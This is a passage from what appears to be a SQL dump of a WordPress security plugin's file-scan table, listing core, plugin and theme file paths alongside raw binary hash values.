Օ','',0,'?'),('�*z1�OR���B�','wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',0,'�wyB���o�|��','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�`�v\ZC��','x���ӡU\ruX�aL�q&����\0�-��N','',0,'?'),('��a0P@�a\\x��-','wp-includes/blocks/social-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G3CqC����C���!','[�ر�?���;v9�Z�sbN8.�����~�','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('������w�� =','wp-content/plugins/wp-cerber/assets/flags/mh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^{�jPJ��9|�����','\r���� @�ݘ�V�~��R�Z�2p<��@','',0,'?'),('���lS$c�N�gh*','wp-includes/wp-includes/rest-api/class-wp-rest-request.php',0,'��)0\0�����l3','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Γ��jN�y��8','U��AM�V\n��PWk�xu�	�	�����/�=','',0,'?'),('�8�C\0ko��	����','wp-includes/wp-includes/js/jquery/ui/controlgroup.js',0,'/�mU��K\ZNP�*{�','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nf-�Io��	.����D','�\";�597�d�;$�9	��ʍװj��ݫ���','',0,'?'),('�ҕ��%�n�d�h��I','wp-includes/wp-includes/js/dist/block-serialization-default-parser.js',0,'4��ņ��%ٔ2����','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('��q��:s���#10]-','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/MockHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��٠1�{ScB�=�2f','KWn=H�9�&15hA7��n��n�g?�sa\\.�','',0,'?'),('��:��u���{���κ','wp-content/plugins/wp-cerber/assets/flags/il.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X���ӱ�K��*q\rP','ۜ8��}�5�[seL>L&���\0\0�*C��\0�','',0,'?'),('��\"�C*�����.��','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('��]���$d�)j��G','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_VE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\<|�����%\0�','C�� ���E��^+t�����GWe���2���X�','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�C��t��,�:�','wp-content/plugins/wordpress-seo/src/repositories/seo-meta-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��je��V_?��ߟ�','���^�h:3�R����ػ�4е@���c��','',0,'?'),('�ޟC�E�O}\rՍ�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/StreamDecoratorTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�����~��W��:','/.��l���s�p�؇�����s�~>Y�7','',0,'?'),('��W��=��؜�/','wp-content/plugins/wp-smushit/app/views/pro-features/meta-box-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�cmA�F�짍֤�','�D�\Z)_,6��ܺ^���9���rlIadi�l��','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('����\nº�N���','wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif',0,'Z��,�ntZ^6�{Lp�4','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�7.�8T��)��w��^','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<����+f�����wi�','�.gG��)A���/���3��q�ϱ�2k\n\'�c�\Z','',0,'?'),('�F��G����i\Z0�','wp-content/plugins/wp-cerber/assets/flags/id.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Z��o��\\cjv�Pԣ','$s�\r�S[J����QvX�\n�IX/���Eo��P','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�5xLB�3�W5�','g�\'�L�W�=�)[�1��>D�˙�{>�&�|Z�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�%RS������TY','`-��������J��\0�P��#M\"�&�o�','',0,'?'),('�[�f��M����)','wp-content/themes/hitmag/inc/kirki/core/class-kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��՗�\Zm�����4+','���-�v�\n�Y����<�I��^���9����','',0,'?'),('�^}R	�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�; |�V����RT{@ȩ','��f���?��!���m�\'�߬|+w�\0��io�','',0,'?'),('�hL\n�h~$t���‘�D','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/nl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d9n��<C�柉f��','(�=��HJmrO�م��L�4�U#2ȝ��','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mF��A���mP�[�','=�<g�cO��N��څ){�B��R�=U�<�','',0,'?'),('�B�|������D�','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����&hE5�Ox��','1\r��*�h\\��B�o���B�}��_��XD7','',0,'?'),('�	���.��%���(<','wp-includes/wp-includes/images/smilies/icon_redface.gif',0,'����U���E����','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4&(���<���_� Ѥ�','Q�!�Fl/��z�*���������~�g4��','',0,'?'),('��E@\"��l����K','wp-content/plugins/wp-smushit/core/api/class-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D������`�ו��','��3�gR�MMm(�mk��ذ�q ��z�����','',0,'?'),('�����-P�F?�:�','wp-includes/blocks/comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�Ae`�-�+8\'��','���y5�����\\OL\n���b�(G�Q\'Ι\"','',0,'?'),('�ޙ�p�jY�!�?�\\�','wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php',0,'��N��p��aC�q�k','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4v��[��r�(�','2̇�!UJ�;�D<s�˕G�V��-�x��)�','',0,'?'),('��IOԦ����H�v','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/QROptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�S��7)v�2�w','P�\n����ܮ�ʂ�\0�_�m횻���1��]q�','',0,'?'),('�옉\r����n�	��','wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�!�������_���','��.�O!���{o�MG��w;���t�ᭉ�','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�	����p�H-l\0','wp-includes/wp-includes/js/jquery/ui/effect-highlight.js',0,'n+)�����I�L\r�','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��֌P���O竪��','��ۣ�/B�F��ĉ�ʞ\'�0�-(?}��m�5�','',0,'?'),('��$d�ЦW���H\'�','wp-content/plugins/disable-gutenberg/inc/settings-display.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jt\n��(�\r�+\\','���/���m.D�{�n�+�M.��V8�#�Ѿ�W','',0,'?'),('�:�p�������&��','wp-content/plugins/wp-cerber/assets/flags/kw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��I�¡�ad�7]�3�','�Yxod� �Z!�_.\"�Q���{�ು���`�X','',0,'?'),('�x\\5n�W\n�����','wp-includes/blocks/embed/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߫D�L򊹀�)\r','�l�0�f��6�!�2��C��\n���\'JǨ�Њ','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('�5��[S.9a*.�ho�','wp-content/plugins/wp-fastest-cache/images/search_reset.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�Z��{е��%�','��}v3&�[�[�m�p�er��n�1�ԇ�M��','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O/c��w�H3��n��','�5�ڷ�1�2A)�_�(}�r��N��I=','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�q��L�Mk~�%','QA�DY�P�ߠ-	��0���C�w��','',0,'?'),('�P\\Ҙ�-�񔰧�g�','wp-content/themes/hitmag/css/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������3x*&�Օ\r�','�Jts���̐/!�y[���R�04�R�<','',0,'?'),('�S��\"BcB�-�y�','wp-content/plugins/wordpress-seo/src/commands/command-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�y���X�@s$Xos�','y�dT!�&R\\�p�^��OS\"N��u�S����','',0,'?'),('�[>�*�ԭA�.���','wp-content/themes/hitmag/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zVRI@[�X���|l','2�\\D�g����q�FQ�{34��j+(0W�y','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S\'Mz��Ǻ�s�','4�B�))�Q\0��F���N�/��t��^N�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(t����\r4��cR','�^�V�x���_:��k	��(��?�B�!','',0,'?'),('�}\'�Ǧ@��g7��j�','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',0,'��1����v��R','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T����	?W��E>}�u���+��','',0,'?'),('㛠.<íC�Ш�KX��','wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfonts.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ݴ��Y��P�4�','cnM���F�칚Y]��,\"�U�g\n��6d','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('�Rs{p~���gЁؑ�','wp-includes/css/dist/reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk-Q6U��J��Ӂ','��ѹ��Q!!�T��Zk�0����\\���','',0,'?'),('��J���l���h�','wp-includes/wp-includes/rest-api/class-wp-rest-server.php',0,'\0}��7V5�I�385','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('���n���8�y�YP','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css',0,'�����(����6�','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('�ړN�P*X5���w','wp-includes/wp-includes/css/editor.css',0,'��`b�L֏�Uy�/','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('�8�?p�C�|T�Z��','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/ResourceOwnerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:Z���(y�H��17','�X��k����f��l���C~}�ֶ��','',0,'?'),('��`c�@3���vz�','wp-includes/blocks/legacy-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"Gkn��u.�18��|','Ug+(�]{ !H��>`�O]����!C�~��ꥋ7','',0,'?'),('�~�Soֆ��2��','wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php',0,'��<w܌*�t���!�','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('�]��׫��H�?','wp-content/plugins/wp-cerber/assets/flags/bd.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��,ߍ1r��K|','KaOq���Q�At�ӱ4 ��=\n���w�ܱ<�','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�sD�hm-��~��j','N*��R��mzj/b3�4�U�3O�[�\Z�','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�j�1ȏ��P�m4k',';�z���s2�g����\0��²�{<�Fn*�7','',0,'?'),('��z~{��Q@���L|','wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css',0,'�k(O�1m<�0v��vV','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥ��&l�.J�E��','b�RV��Em�-G��$�Yq�y/(rG�9M�','',0,'?'),('�)�dX�:��h:}k','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*��y��&9{�1v��',':��9�@�U�x��.�kk��X�W�/�3g(','',0,'?'),('�,��*iV�O1a�\n3�','wp-includes/blocks/post-featured-image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�\"m+2�2�Ւ;�I','|���v+Ko5~�X��y���#0���o�7p','',0,'?'),('�7H-��0�\\t�\nC�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�<G�\Z�3�^�*���','wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�8��T��2y�ɜ','ʵM«�Fc��/����\0���{��̰P�� ','',0,'?'),('�J\\��A�0�!�P���','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Traits/Container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ȤǬ�c;��8�K0','��Qi����r�t`RU�o���kG,�=EP�k�;','',0,'?'),('�O�L��OT��s�','wp-content/plugins/redirection/locale/redirection-es_CO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o:ʐ_92��OA�Zf','tE����N�<`�5~p���F!|so�s�\rn��','',0,'?'),('�UA�;��,}����v�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',0,'���aER>60�.)H','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�\\/蝄W�n�-�\n� 9','wp-includes/blocks/image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	4�SV?���B�','d�h�𦉥c���2�B�����ɧC�','',0,'?'),('�pɄ�bq���dgf��','wp-includes/wp-includes/js/customize-selective-refresh.min.js',0,'E�G�埳6�0�b�','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('�y�bb�ߏu$#Ԗ','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KP񟗩���4�����','�naӱ��*gUq��y#���Ia���`*�;�','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�?	z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fm�vCI=�wb־�;','��L�c�c��9�00p����$Žӥ����','',0,'?'),('�x����4���qL�','wp-content/plugins/redirection/locale/redirection-en_GB.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nϸ $ħ�h�͠���','���n���Ӹ:�jPC�Gk�☁����I[\'','',0,'?'),('�#�O�呌����)','wp-content/themes/hitmag/inc/widgets/block-posts-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gI��L<��Fc��','){|J c��p�^��q���n�3��m��xk�','',0,'?'),('�������J���','wp-includes/wp-includes/theme-compat/embed-content.php',0,'�m\'牉�TeD�]pCA','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('�̯[/�T-°>Ə�','wp-content/plugins/wp-smushit/_src/scss/modules/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�4-�Zs�F2','�,��Fq�|��㸄o���Z@c�ݵh��s�','',0,'?'),('��,G��/�u��~e{�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/ArrayAccessorTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�\\?LbY���(�','<\'�S�y�9+o�n��	�!��\\�%o-c','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������	�1��S|','\Z��>\\2q���غ�H��t(b�W�]rDB��5','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Y�S�ރ������a��','��RM�S$��J�a����\\tu���dXq�\\�','',0,'?'),('�m��`��]O��.�','wp-content/themes/hitmag/inc/kirki/modules/tooltips/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���4�y���wL�','q^.I�-w�.���+��8f>�1�.H�\r\r��5�','',0,'?'),('�\07m	�\n\\[�R\'�+','wp-includes/wp-includes/sodium_compat/autoload.php',0,'uw�h[e��z�x��','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('���3��DA�M3߼','wp-content/plugins/wp-smushit/app/views/settings/accessibility-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�n�)cY��ICΝ\0','�_X�0�t\Z�a�5�����`o�\0��_��\n','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�)�鷫��g̨R','wp-includes/blocks/loginout/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Y6�X&K��5�G�','�H�=�֐x7D��Rmrê3�D�M����w��','',0,'?'),('�+��i�aM�y�f��','wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php',0,'��d���j�F����3','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('�5&$5Q���5��N�','wp-includes/js/dist/edit-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':@|�+�32�-���','��vӎ�ne������?,�|5h�@V仭�]�','',0,'?'),('�7�s�8L*�L�h�*�','wp-content/themes/hitmag/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��MV�\0:d+Zg����','��`)�Ds�+l�+�n���S:}\Z�:A���','',0,'?'),('�:�\\nJ���E���!','wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4f���\'?��S�','JL�P�=�<c3+�a�O՗��E(г','',0,'?'),('�@.\\A�{5)q*�`','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�o̎r����|A5)��','/9���K݈�3/�w�շ�@sO�0�','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�޻����X�P��>','=���[��Ix�O�\r�P��H�];�\"���ٰ','',0,'?'),('�F�p���j��b��','wp-content/plugins/wp-fastest-cache/js/dialog_new.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6l;�2��Q8A���','����o���Is��U3��a����Z���N�Ӻ�','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�M<61=�3|\0\"?���','wp-includes/wp-includes/js/dist/hooks.js',0,'�\'����ʣJ1�iz��','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('�R��q� v��z\rPU','wp-content/plugins/wordfence/languages/wordfence.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0%���=X�Ӽ/��',']�%�N�8��ܠ��럷��_�;��\rD�,e��','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�\\=NҎXfڸ\rg&�	�','wp-includes/wp-includes/js/dist/blocks.min.js',0,'�F�2�~����CO�','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�e��)��\r�se','wp-includes/wp-includes/js/customize-preview-widgets.min.js',0,'�T-�6�P)H�=��','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('�l�?k��!i�zD�','wp-content/plugins/wordpress-seo/src/actions/importing/abstract-aioseo-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RMX��UEh�D�P\ZR','�s��VG�iJIH���v�3�#]�����La','',0,'?'),('�l�j���bʯq)4o','wp-content/plugins/wp-smushit/app/views/smush-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�A�?�|��U7�','B[���W���,i���I	�,C#�2�H� ','',0,'?'),('�o���:oNp\'d�!','wp-content/plugins/wordpress-seo/src/helpers/string-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6૓(D��4\"�x��','��fV�\'�M��|Gɯ\0MT\0��)�|[7��y','',0,'?'),('�se���Qr^T�K�','wp-includes/blocks/post-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�Ι0�Yl%��&�|_','ߵ�О.(�����\\���ƢP%Qv=F','',0,'?'),('�#�nΐ���	���','wp-includes/css/dist/edit-site/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�K;�I6�VU�N��!','�HS7O�o5D9Ni�ClQù�e���Hg��\\�','',0,'?'),('�ka���C�lKrW�','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/abstract-aioseo-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\\ފ��wk���L��','�W�	l����K^���1��L�ў�5~','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('嚯�W,$�q�U��','wp-content/plugins/redirection/models/redirect/redirect-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UO8c��,Ϝdo��','��\'�QV=\n�W<5��U\0)�Լ�1-�9�','',0,'?'),('���I<r�y�Y���','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',0,'Y[�&A*zϦ/��?<�','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('���8�|L�P�	','wp-content/plugins/wordpress-seo/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Li����������`�','����q�3��%�:��a�S�Q�Uә�e','',0,'?'),('堩�7m����6�1','wp-content/plugins/wp-smushit/app/modals/webp-delete-all.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�L��.1��','�˽-XT�{[�s�9v�\Zf�1�O���S���','',0,'?'),('峳$� 